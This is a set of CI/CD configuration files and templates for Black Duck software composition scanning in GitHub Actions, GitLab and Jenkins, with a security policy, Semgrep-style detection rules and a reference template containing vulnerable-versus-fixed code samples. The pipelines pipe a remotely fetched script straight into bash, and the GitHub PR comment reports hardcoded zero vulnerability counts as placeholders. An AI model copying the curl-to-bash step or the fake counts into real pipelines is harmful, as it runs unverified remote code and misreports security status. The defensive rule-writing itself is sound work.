# Parse results and check for critical vulnerabilities
if [ -f ./blackduck-output/runs/*/status/status.json ]; then
CRITICAL=$(jq -r '.policyStatus.overallStatus' ./blackduck-output/runs/*/status/status.json)
if [ "$CRITICAL" = "IN_VIOLATION" ]; then
echo "::error::Policy violations detected - build should fail"
exit 1
fi
fi
- name: Comment on PR
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
script: |
// Build a placeholder summary; parse real counts from the status JSON under blackduck-output/ if needed
let comment = '## Black Duck SCA Scan Results\n\n';
comment += `**Project**: ${process.env.PROJECT_NAME}\n`;
comment += `**Version**: ${process.env.PROJECT_VERSION}\n\n`;
// Add vulnerability summary
comment += '### Security Summary\n';
comment += '| Severity | Count |\n';
comment += '|----------|-------|\n';
comment += '| Critical | 0 |\n'; // Parse from actual results
comment += '| High | 0 |\n';
comment += '| Medium | 0 |\n';
comment += '| Low | 0 |\n\n';
comment += '### License Compliance\n';
comment += '✅ No license violations detected\n\n';
comment += '**Full reports available in workflow artifacts**\n';
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: comment
});
# Optional: Upload to GitHub Code Scanning (requires converting Black Duck results to SARIF first; blackduck-sarif.json below is a placeholder name)
code-scanning:
name: Upload to Code Scanning
runs-on: ubuntu-latest
needs: blackduck-scan
if: always()
steps:
- name: Download SARIF
uses: actions/download-artifact@v4
with:
name: blackduck-reports-${{ github.sha }}
- name: Upload SARIF to Code Scanning
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: blackduck-sarif.json
category: black-duck-sca

View File

@@ -0,0 +1,191 @@
# GitLab CI/CD configuration for Black Duck SCA scanning
#
# Add this to your .gitlab-ci.yml or include it:
# include:
# - local: 'assets/ci_integration/gitlab_ci.yml'
variables:
BLACKDUCK_URL: ${BLACKDUCK_URL}
BLACKDUCK_TOKEN: ${BLACKDUCK_API_TOKEN}
PROJECT_NAME: ${CI_PROJECT_PATH}
PROJECT_VERSION: ${CI_COMMIT_REF_NAME}-${CI_COMMIT_SHORT_SHA}
stages:
- security-scan
- security-report
# Black Duck SCA Scan
blackduck-sca-scan:
stage: security-scan
image: ubuntu:22.04
before_script:
- apt-get update && apt-get install -y curl bash jq
- echo "Starting Black Duck scan for ${PROJECT_NAME}"
- echo "Version ${PROJECT_VERSION}"
script:
# Run Black Duck Detect
- |
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=${BLACKDUCK_URL} \
--blackduck.api.token=${BLACKDUCK_TOKEN} \
--detect.project.name="${PROJECT_NAME}" \
--detect.project.version.name="${PROJECT_VERSION}" \
--detect.policy.check.fail.on.severities=BLOCKER,CRITICAL \
--detect.wait.for.results=true \
--detect.risk.report.pdf=true \
--detect.notices.report=true \
--detect.output.path=./blackduck-output \
--detect.cleanup=false
after_script:
# Generate summary report
- |
if [ -f ./blackduck-output/runs/*/status/status.json ]; then
echo "=== Black Duck Scan Summary ==="
jq -r '.policyStatus' ./blackduck-output/runs/*/status/status.json
fi
artifacts:
name: "blackduck-reports-${CI_COMMIT_SHORT_SHA}"
paths:
- blackduck-output/**/BlackDuck_RiskReport_*.pdf
- blackduck-output/**/BlackDuck_Notices_*.txt
- blackduck-output/**/*_Black_Duck_scan.json
expire_in: 30 days
reports:
# GitLab dependency scanning report format (Detect does not emit this file itself; generate it with a converter or remove this line)
dependency_scanning: blackduck-output/gl-dependency-scanning-report.json
rules:
# Run on merge requests
- if: $CI_MERGE_REQUEST_ID
# Run on main/master branch
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
# Run on tags
- if: $CI_COMMIT_TAG
# Run on scheduled pipelines
- if: $CI_PIPELINE_SOURCE == "schedule"
# Manual trigger
- if: $CI_PIPELINE_SOURCE == "web"
allow_failure: false # Fail pipeline on policy violations
# Generate SBOM
blackduck-sbom:
stage: security-scan
image: ubuntu:22.04
before_script:
- apt-get update && apt-get install -y curl bash jq
script:
- |
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=${BLACKDUCK_URL} \
--blackduck.api.token=${BLACKDUCK_TOKEN} \
--detect.project.name="${PROJECT_NAME}" \
--detect.project.version.name="${PROJECT_VERSION}" \
--detect.tools=DETECTOR \
--detect.bom.aggregate.name=sbom-cyclonedx.json \
--detect.output.path=./sbom-output
artifacts:
name: "sbom-${CI_COMMIT_SHORT_SHA}"
paths:
- sbom-output/**/sbom-cyclonedx.json
expire_in: 90 days
rules:
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
- if: $CI_COMMIT_TAG
- if: $CI_PIPELINE_SOURCE == "schedule"
# Security Report Summary
blackduck-summary:
stage: security-report
image: ubuntu:22.04
needs: ["blackduck-sca-scan"]
before_script:
- apt-get update && apt-get install -y jq curl
script:
- |
# Parse Black Duck results and create summary
echo "## Black Duck SCA Scan Summary" > security-summary.md
echo "" >> security-summary.md
echo "**Project**: ${PROJECT_NAME}" >> security-summary.md
echo "**Version**: ${PROJECT_VERSION}" >> security-summary.md
echo "**Scan Date**: $(date -u +%Y-%m-%dT%H:%M:%SZ)" >> security-summary.md
echo "" >> security-summary.md
# Add vulnerability summary if available
if [ -f blackduck-output/runs/*/status/status.json ]; then
echo "### Vulnerability Summary" >> security-summary.md
jq -r '.componentStatus' blackduck-output/runs/*/status/status.json >> security-summary.md || true
fi
cat security-summary.md
artifacts:
# GitLab's reports:metrics expects OpenMetrics format, so publish the Markdown summary as a regular artifact instead
paths:
- security-summary.md
expire_in: 30 days
rules:
- if: $CI_MERGE_REQUEST_ID
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
# Policy Check (can be used as a gate)
blackduck-policy-gate:
stage: security-report
image: ubuntu:22.04
needs: ["blackduck-sca-scan"]
script:
- |
# Check policy status
if [ -f ./blackduck-output/runs/*/status/status.json ]; then
POLICY_STATUS=$(jq -r '.policyStatus.overallStatus' ./blackduck-output/runs/*/status/status.json)
if [ "$POLICY_STATUS" = "IN_VIOLATION" ]; then
echo "❌ Policy violations detected!"
echo "Critical or high-severity vulnerabilities found."
echo "Review the Black Duck report for details."
exit 1
else
echo "✅ No policy violations detected"
fi
else
echo "⚠️ Warning: Unable to verify policy status"
exit 1
fi
rules:
# Only run as gate on merge requests and main branch
- if: $CI_MERGE_REQUEST_ID
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
# Scheduled daily scan (comprehensive)
blackduck-scheduled-scan:
extends: blackduck-sca-scan
rules:
- if: $CI_PIPELINE_SOURCE == "schedule"
variables:
# More comprehensive scan for scheduled runs
DETECT_TOOLS: "DETECTOR,SIGNATURE_SCAN,BINARY_SCAN"
script:
- |
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=${BLACKDUCK_URL} \
--blackduck.api.token=${BLACKDUCK_TOKEN} \
--detect.project.name="${PROJECT_NAME}" \
--detect.project.version.name="${PROJECT_VERSION}" \
--detect.tools=${DETECT_TOOLS} \
--detect.risk.report.pdf=true \
--detect.notices.report=true \
--detect.policy.check.fail.on.severities=BLOCKER,CRITICAL,MAJOR \
--detect.wait.for.results=true \
--detect.output.path=./blackduck-output

View File

@@ -0,0 +1,310 @@
// Jenkins Declarative Pipeline for Black Duck SCA Scanning
//
// Prerequisites:
// 1. Install "Synopsys Detect" plugin in Jenkins
// 2. Install "Pipeline Utility Steps" plugin (provides the readJSON step used below)
// 3. Configure Black Duck server in Jenkins Global Configuration
// 4. Add credentials with IDs: blackduck-url and blackduck-api-token
pipeline {
agent any
parameters {
choice(
name: 'SCAN_TYPE',
choices: ['RAPID', 'INTELLIGENT', 'FULL'],
description: 'Type of Black Duck scan to perform'
)
booleanParam(
name: 'FAIL_ON_POLICY_VIOLATION',
defaultValue: true,
description: 'Fail build on policy violations'
)
booleanParam(
name: 'GENERATE_SBOM',
defaultValue: false,
description: 'Generate Software Bill of Materials'
)
}
environment {
BLACKDUCK_URL = credentials('blackduck-url')
BLACKDUCK_TOKEN = credentials('blackduck-api-token')
PROJECT_NAME = "${env.JOB_NAME}"
PROJECT_VERSION = "${env.BRANCH_NAME}-${env.BUILD_NUMBER}"
DETECT_JAR_DOWNLOAD_DIR = "${WORKSPACE}/.blackduck"
}
options {
timestamps()
timeout(time: 2, unit: 'HOURS')
buildDiscarder(logRotator(numToKeepStr: '30', artifactNumToKeepStr: '10'))
}
stages {
stage('Preparation') {
steps {
script {
echo "=========================================="
echo "Black Duck SCA Scan"
echo "=========================================="
echo "Project: ${PROJECT_NAME}"
echo "Version: ${PROJECT_VERSION}"
echo "Scan Type: ${params.SCAN_TYPE}"
echo "=========================================="
}
// Clean previous scan results
sh 'rm -rf blackduck-output || true'
sh 'mkdir -p blackduck-output'
}
}
stage('Dependency Installation') {
steps {
script {
// Install dependencies based on project type
if (fileExists('package.json')) {
echo 'Node.js project detected'
sh 'npm ci || npm install'
}
else if (fileExists('requirements.txt')) {
echo 'Python project detected'
sh 'pip install -r requirements.txt'
}
else if (fileExists('pom.xml')) {
echo 'Maven project detected'
sh 'mvn dependency:resolve'
}
else if (fileExists('build.gradle')) {
echo 'Gradle project detected'
sh './gradlew dependencies'
}
}
}
}
stage('Black Duck Scan') {
steps {
script {
def detectCommand = """
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=${BLACKDUCK_URL} \
--blackduck.api.token=${BLACKDUCK_TOKEN} \
--detect.project.name="${PROJECT_NAME}" \
--detect.project.version.name="${PROJECT_VERSION}" \
--detect.output.path=${WORKSPACE}/blackduck-output \
--detect.cleanup=false \
--detect.risk.report.pdf=true \
--detect.notices.report=true \
"""
// Add scan type configuration
switch(params.SCAN_TYPE) {
case 'RAPID':
detectCommand += " --detect.detector.search.depth=0"
detectCommand += " --detect.blackduck.signature.scanner.snippet.matching=SNIPPET_MATCHING"
break
case 'INTELLIGENT':
detectCommand += " --detect.detector.search.depth=3"
break
case 'FULL':
detectCommand += " --detect.tools=DETECTOR,SIGNATURE_SCAN,BINARY_SCAN"
detectCommand += " --detect.detector.search.depth=10"
break
}
// Add policy check if enabled
if (params.FAIL_ON_POLICY_VIOLATION) {
detectCommand += " --detect.policy.check.fail.on.severities=BLOCKER,CRITICAL"
detectCommand += " --detect.wait.for.results=true"
}
// Execute scan
try {
sh detectCommand
} catch (Exception e) {
if (params.FAIL_ON_POLICY_VIOLATION) {
error("Black Duck policy violations detected!")
} else {
unstable("Black Duck scan completed with violations")
}
}
}
}
}
stage('Generate SBOM') {
when {
expression { params.GENERATE_SBOM == true }
}
steps {
script {
sh """
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=${BLACKDUCK_URL} \
--blackduck.api.token=${BLACKDUCK_TOKEN} \
--detect.project.name="${PROJECT_NAME}" \
--detect.project.version.name="${PROJECT_VERSION}" \
--detect.tools=DETECTOR \
--detect.bom.aggregate.name=sbom-cyclonedx.json \
--detect.output.path=${WORKSPACE}/sbom-output
"""
}
}
}
stage('Parse Results') {
steps {
script {
// Parse Black Duck results
def statusFile = sh(
script: 'find blackduck-output -name "status.json" -type f | head -n 1',
returnStdout: true
).trim()
if (statusFile) {
def status = readJSON file: statusFile
echo "Policy Status: ${status.policyStatus?.overallStatus}"
echo "Component Count: ${status.componentStatus?.componentCount}"
// Set build description
currentBuild.description = """
Black Duck Scan Results
Policy: ${status.policyStatus?.overallStatus}
Components: ${status.componentStatus?.componentCount}
""".stripIndent()
}
}
}
}
stage('Publish Reports') {
steps {
// Archive reports
archiveArtifacts(
artifacts: 'blackduck-output/**/BlackDuck_RiskReport_*.pdf,blackduck-output/**/BlackDuck_Notices_*.txt',
allowEmptyArchive: true,
fingerprint: true
)
// Archive SBOM if generated
archiveArtifacts(
artifacts: 'sbom-output/**/sbom-cyclonedx.json',
allowEmptyArchive: true,
fingerprint: true
)
// Publish HTML reports
publishHTML([
allowMissing: true,
alwaysLinkToLastBuild: true,
keepAll: true,
reportDir: 'blackduck-output',
reportFiles: '**/*.html',
reportName: 'Black Duck Security Report'
])
}
}
stage('Quality Gate') {
when {
expression { params.FAIL_ON_POLICY_VIOLATION == true }
}
steps {
script {
// Check for policy violations
def statusFile = sh(
script: 'find blackduck-output -name "status.json" -type f | head -n 1',
returnStdout: true
).trim()
if (statusFile) {
def status = readJSON file: statusFile
if (status.policyStatus?.overallStatus == 'IN_VIOLATION') {
error("Build failed: Black Duck policy violations detected")
} else {
echo "✅ No policy violations detected"
}
}
}
}
}
}
post {
always {
// Clean up workspace
cleanWs(
deleteDirs: true,
patterns: [
[pattern: '.blackduck', type: 'INCLUDE'],
[pattern: 'blackduck-output/runs', type: 'INCLUDE']
]
)
}
success {
echo '✅ Black Duck scan completed successfully'
// Send notification (configure as needed)
// emailext(
// subject: "Black Duck Scan Success: ${PROJECT_NAME}",
// body: "Black Duck scan completed with no policy violations",
// to: "${env.CHANGE_AUTHOR_EMAIL}"
// )
}
failure {
echo '❌ Black Duck scan failed or policy violations detected'
// Send notification
// emailext(
// subject: "Black Duck Scan Failed: ${PROJECT_NAME}",
// body: "Black Duck scan detected policy violations. Review the report for details.",
// to: "${env.CHANGE_AUTHOR_EMAIL}"
// )
}
unstable {
echo '⚠️ Black Duck scan completed with warnings'
}
}
}
// Shared library functions (optional)
def getProjectType() {
if (fileExists('package.json')) return 'nodejs'
if (fileExists('requirements.txt')) return 'python'
if (fileExists('pom.xml')) return 'maven'
if (fileExists('build.gradle')) return 'gradle'
if (fileExists('Gemfile')) return 'ruby'
if (fileExists('go.mod')) return 'golang'
return 'unknown'
}
def installDependencies(projectType) {
switch(projectType) {
case 'nodejs':
sh 'npm ci || npm install'
break
case 'python':
sh 'pip install -r requirements.txt'
break
case 'maven':
sh 'mvn dependency:resolve'
break
case 'gradle':
sh './gradlew dependencies'
break
case 'ruby':
sh 'bundle install'
break
case 'golang':
sh 'go mod download'
break
default:
echo "Unknown project type, skipping dependency installation"
}
}

View File

@@ -0,0 +1,182 @@
{
"$schema": "https://json-schema.org/draft-07/schema#",
"title": "Black Duck Security Policy",
"description": "Default security policy for Black Duck SCA scanning",
"version": "1.0.0",
"vulnerability_thresholds": {
"description": "Maximum allowed vulnerabilities by severity",
"critical": {
"max_count": 0,
"action": "fail",
"description": "No critical vulnerabilities allowed"
},
"high": {
"max_count": 0,
"action": "fail",
"description": "No high severity vulnerabilities allowed"
},
"medium": {
"max_count": 10,
"action": "warn",
"description": "Up to 10 medium severity vulnerabilities allowed with warning"
},
"low": {
"max_count": 50,
"action": "info",
"description": "Up to 50 low severity vulnerabilities allowed"
}
},
"cvss_thresholds": {
"description": "CVSS score-based policy",
"max_cvss_score": 7.0,
"fail_on_exploitable": true,
"require_exploit_available": false
},
"license_policy": {
"description": "License compliance rules",
"blocklist": [
{
"license": "GPL-2.0",
"reason": "Strong copyleft incompatible with commercial software",
"action": "fail"
},
{
"license": "GPL-3.0",
"reason": "Strong copyleft incompatible with commercial software",
"action": "fail"
},
{
"license": "AGPL-3.0",
"reason": "Network copyleft triggers on SaaS usage",
"action": "fail"
}
],
"warning_list": [
{
"license": "LGPL-2.1",
"reason": "Weak copyleft - verify dynamic linking",
"action": "warn"
},
{
"license": "LGPL-3.0",
"reason": "Weak copyleft - verify dynamic linking",
"action": "warn"
},
{
"license": "MPL-2.0",
"reason": "File-level copyleft - verify separation",
"action": "warn"
}
],
"approved_list": [
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"ISC",
"0BSD",
"CC0-1.0",
"Unlicense"
],
"require_approval_for_new_licenses": true,
"fail_on_unknown_license": true
},
"component_policy": {
"description": "Component usage and quality rules",
"blocklist": [
{
"name": "event-stream",
"version": "3.3.6",
"reason": "Known malicious version with cryptocurrency stealer",
"action": "fail"
}
],
"quality_requirements": {
"min_github_stars": 10,
"min_contributors": 2,
"max_age_days": 1095,
"require_active_maintenance": true,
"max_days_since_update": 730,
"fail_on_deprecated": true,
"fail_on_unmaintained": false
}
},
"operational_risk": {
"description": "Supply chain and operational risk policies",
"fail_on_unmaintained": false,
"max_days_inactive": 730,
"require_repository_url": true,
"warn_on_single_maintainer": true,
"fail_on_no_repository": false
},
"sbom_requirements": {
"description": "Software Bill of Materials requirements",
"require_sbom_generation": true,
"sbom_format": "CycloneDX",
"sbom_version": "1.4",
"include_transitive_dependencies": true,
"include_license_info": true
},
"compliance_requirements": {
"description": "Regulatory compliance mappings",
"frameworks": [
"SOC2",
"PCI-DSS",
"GDPR",
"HIPAA"
],
"require_vulnerability_tracking": true,
"require_remediation_timeline": true,
"max_remediation_days": {
"critical": 7,
"high": 30,
"medium": 90,
"low": 180
}
},
"exclusions": {
"description": "Global exclusions and exceptions",
"paths": [
"test/**",
"tests/**",
"**/test/**",
"**/__tests__/**",
"**/*.test.js",
"**/*.spec.js",
"node_modules/**/.bin/**"
],
"dev_dependencies": {
"exclude_from_production_scan": true,
"apply_relaxed_policy": true
}
},
"notification_settings": {
"description": "Alert and notification configuration",
"notify_on_new_vulnerabilities": true,
"notify_on_policy_violation": true,
"notify_on_license_violation": true,
"notification_channels": [
"email",
"slack",
"jira"
]
},
"remediation_guidance": {
"description": "Remediation policy and guidance",
"auto_create_tickets": true,
"ticket_system": "jira",
"assign_to_component_owner": true,
"require_risk_acceptance_approval": true,
"max_risk_acceptance_duration_days": 90
}
}

View File

@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise

View File

@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
// - Direct DOM manipulation (innerHTML, document.write)
// - React dangerouslySetInnerHTML with user data
// - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
